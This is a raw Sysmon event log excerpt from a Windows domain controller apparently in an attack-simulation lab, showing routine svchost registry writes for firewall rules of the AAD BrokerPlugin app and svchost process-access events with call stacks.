13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:20.508{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\PolicyVersionDWORD (0x0000021a) 13241300x800000000000000010397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:20.508{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272S-1-5-21-2311372046-1276363322-545193238-500v2.26|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|C=S-1-15-3-1|C=S-1-15-3-3|C=S-1-15-3-8|C=S-1-15-3-9|C=S-1-15-3-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|M=microsoft.aad.brokerplugin_cw5n1h2txyewy|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|D=C:\Windows\SystemApps\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\|PFN=Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy| 13241300x800000000000000010396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:20.508{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{F0470520-4E88-4698-9859-6FDD736DFDFD}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Platform=2:6:2|Platform2=GTEQ| 13241300x800000000000000010395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:20.492{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{94A00FA3-26DE-47D2-A2F2-C2D729EFD471}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Platform=2:6:2|Platform2=GTEQ| 13241300x800000000000000010394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:20.492{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{8CB0B3A9-9B59-484A-BF13-BDC946728D49}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}| 13241300x800000000000000010393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:20.492{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{D53537F6-2C13-4877-8FBD-EB83950F5763}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Private|Profile=Public|RA42=RmtIntrAnet|RA62=RmtIntrAnet|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Security=Authenticate| 13241300x800000000000000010392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:20.492{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{FE8CA963-0FE0-45EC-987D-42B6EACB9FD6}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|RA42=RmtIntrAnet|RA62=RmtIntrAnet|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Security=Authenticate| 13241300x800000000000000010391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:20.492{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{89515849-FB45-41A6-BBB8-A39F860A1511}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntrAnet|RA62=IntrAnet|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}| 13241300x800000000000000010390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:20.492{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{076EC4CC-9898-458C-A972-C4686F991276}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Profile=Public|RA42=IntrAnet|RA62=IntrAnet|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}| 13241300x800000000000000010389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:20.492{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{C0952F05-AF2B-4E8C-B96D-4E5477112A63}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}| 13241300x800000000000000010388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:20.492{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{B30DC35A-01D2-40B0-95EC-69762492EC0B}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}| 10341000x800000000000000010387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 